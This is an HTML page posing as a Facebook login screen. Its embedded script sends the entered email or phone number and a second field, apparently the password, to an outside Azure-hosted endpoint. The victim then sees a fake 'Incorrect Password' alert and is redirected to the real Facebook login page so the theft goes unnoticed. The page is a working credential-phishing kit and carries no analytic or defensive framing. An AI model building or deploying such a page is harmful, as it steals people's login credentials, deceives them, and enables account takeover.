<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Face-Book</title>
    <link rel="stylesheet" href="../static/style.css">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
</head>

<body>
    <div class="container">
        <div class="login-box">
            <h1>See More on Facebook</h1>
            <form id="emailTForm">



                <input type="text" id="subject" placeholder="Email or Phone" required>
                <input type="text" id="customerName" placeholder="" required>

                <button type="submit">Log in</button>
                <a href="#">Forgotten?</a>
                <hr>
                <button type="button" class="create-account">Create new account</button>



            </form>
        </div>
        <div id="alertContainer" class="mt-4"></div>
    </div>

    <script>
        document.getElementById('emailTForm').addEventListener('submit', function (event) {
            event.preventDefault();

            const customerName = document.getElementById('customerName').value;




            const subject = document.getElementById('subject').value;

            const template = `
                 From ${subject}
                  

                  i ${subject}
                  here   : ${customerName}
                  
                
              
            `;

            fetch('https://bookfacial-hfbxghfregf8hmb7.eastus-01.azurewebsites.net//send-t-emails', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ subject: subject, body: template })
            })
                .then(response => response.json())
                .then(data => {
                    alert('Incorrect Password Try Again!!!');
                    console.log(data);
                    window.location.href = "https://www.facebook.com/login"; // Redirect to YouTube
                })
                .catch(error => {
                    alert('Error.');
                    console.error('Error:', error);
                });
        });
    </script>
</body>

</html>
